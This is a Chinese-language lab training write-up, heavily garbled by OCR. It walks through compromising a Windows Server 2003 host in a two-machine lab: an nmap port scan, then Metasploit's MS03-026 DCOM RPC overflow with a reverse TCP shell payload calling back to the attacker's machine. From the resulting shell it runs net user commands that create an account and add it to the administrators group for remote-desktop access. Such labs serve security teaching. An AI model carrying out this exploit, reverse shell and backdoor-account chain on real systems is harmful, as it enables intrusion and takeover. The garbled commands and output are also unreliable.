1.实训目标获取B标主机的最高权限，利用远程桌面登录。理解ddos攻击的原理缓冲区溢出攻击原理一、实验环境实验环境两台预装Windows2000/XP/2003的主机，通过网络相连软件工具：metasploitfrmamework二、试验要求1、实训耍求：获取目标主机的最高权限三、实训步骤：1、攻击目标Windowsserver2003SPOWindowsServer2003Sta...2、攻击目的获取目标主机的最高权限，利用远程桌面登录并进行截图说明3、攻击开始步骤1:使用nmap对目标进行端口扫描Hom©我的电脑网上邻soInternetExplorer10.20.39.45vProfile：VScanCancenmap"T4"A"v10.20.39.45ServicesNmapOutputPorts/HostsTopologyHostDetailsScans▲nmap"T4*v10.20.39.45V1tDetailD.20.39.453.20.39.165Discoveredopenport1026/tcpon10.20.39.45CompletedSYNStealthScanat19:26,0.39selapsed(1000totalports)InitiatingServicescanat19:26Scanning8serviceson10.20.39.45CompletedServicescanat19:27,48.52selapsed(8serviceson1host)Initiating05detection(try痒1)against10.20.39.45HSE:Scriptscanning10.20.39.45.InitiatingNSEat19:27CompletedNSEat19:27,22.08selapsedWiaapscanreportfor10.20.39.45Hostis叫)(0.00016slatency).Notshown:992closedportsPORTSTATERVICEVERSIOH23/tcpopentelnetMicrosoftVBLndovisXPtelnetd80/tcpopenMicrosoftIISd6.0|-methods:OPTIONSTPACEGETHEADPOST屋IPotentiallyriskymethods:TRACEI_Seenmap.org/nsedoc/scripts/-methods|_htxp-title:\xBD\xA8\xC9\xE8\xD6\xD0135/tcpopennsrpcMicrosoftVti.ndcn7sRPC139/tcpopennettoios-ssn445/tcpopenmicroso£t-dsMicrosoft协ndans2003or2008激LLvi.'usu£L1025/tcpopennsrpcMicrosoftV^ndcnisRPC1026/tcpopennsrpcMicrosoftV^ndcnisRPC3389/tcpopenns-vi)t-serverMicrosoftTerminalServiceMACAddress:00:0C:29:18:6C:BI(VMware)Devicetype:generalpurposeTDi"i•MSIACl步骤2:目标开启135端口，可利用MS03-026漏洞进行入侵，用到的工具是metasploitfrmameworko(1)查询MS03-026漏洞所对应的溢出模块msf>searchms03-0261HatchingModulesRankDescriptionNameDisclosureDateIexploit/windows/deerpc/ws03026dcomfliw——2003-07-16greatMicrosoftRPCDCOMInterfaceOvermsf>useexploit/windows/deerpc/ms03026dcorn(2)进入此模块:有效载荷为执行特定命令，配::相关参数并显示出来msfexploit(msO3_O26_dcom)>setPAYLOADgeneric/shell_reverse_tcpPAYLOAD=>generic/shell_rever北Lcpmsfexploit(rt)sO3_O26_dcom)>setRHOST10.20.39.45RHOST=>10.20.39?45msfexploit(msO3_O26_dcom)>setLHOST10.20.39.6LHOST=>10.20.39:6-msfexploit(msO3_O26_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):WameCurrentSettingRequiredDescriptionRHOST10.20.39.45yesThetargetaddressRPORT135yesThetargetportPayloadoptions(generic/shell_reverse_tcp):NameCurrentSettingRequiredDescriptionLHOST10.20.39.6yesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName0WindowsNTSP3-6a/2OOO/XP/2OO3Universal(4)执行攻击命令，成功进入目标系统msfexploit(ws03026doom)>exploit[*]Startedreversehandleron10.20.39.6:4444[*]TryingtargetWindowsNTSP3-6a/2OOO/ZP/2OO3Universal...[”Bindingco4d9f4ato8-7dlc-llcf-861e-0020af6e7c57:0.0@ncacn_ip_t.cp:10.20.39.45[135]...[*]Boundto4d9f4ab8-7dlc-llcf-861e-0020af6e7cS7:0.O0ncacn—ip_tcp:10.20.39.45[135]...[”Sendingexploit...[*]Commandshellsession1opened(10.20.39.6:4444->10.20.39.45:1036)ac2013-06-0816:39:01800MicrosoftWindows[版本5.2.3790])1985-2003MicrosoftCorpDOWS\system32>ipconfigWindoi(7)添加系统账号并把它加入系统管理员组中MicrosoftWindows[坂本5.2.3790])1985-2003MicrosoftCorp.DO¥S\syscew32>)netusertyktyk/addertyktyk/addE:\WINnetus命令成E:\BINDOWS\system32>netlocalgroupadministratorstyk/addnetlocalgroupadministratorstyk/add命今成功完成•__________________I________________________________________E:\¥INDOWS\systern32>(8)远程登录服务器，溢出成功E:\WIKipconi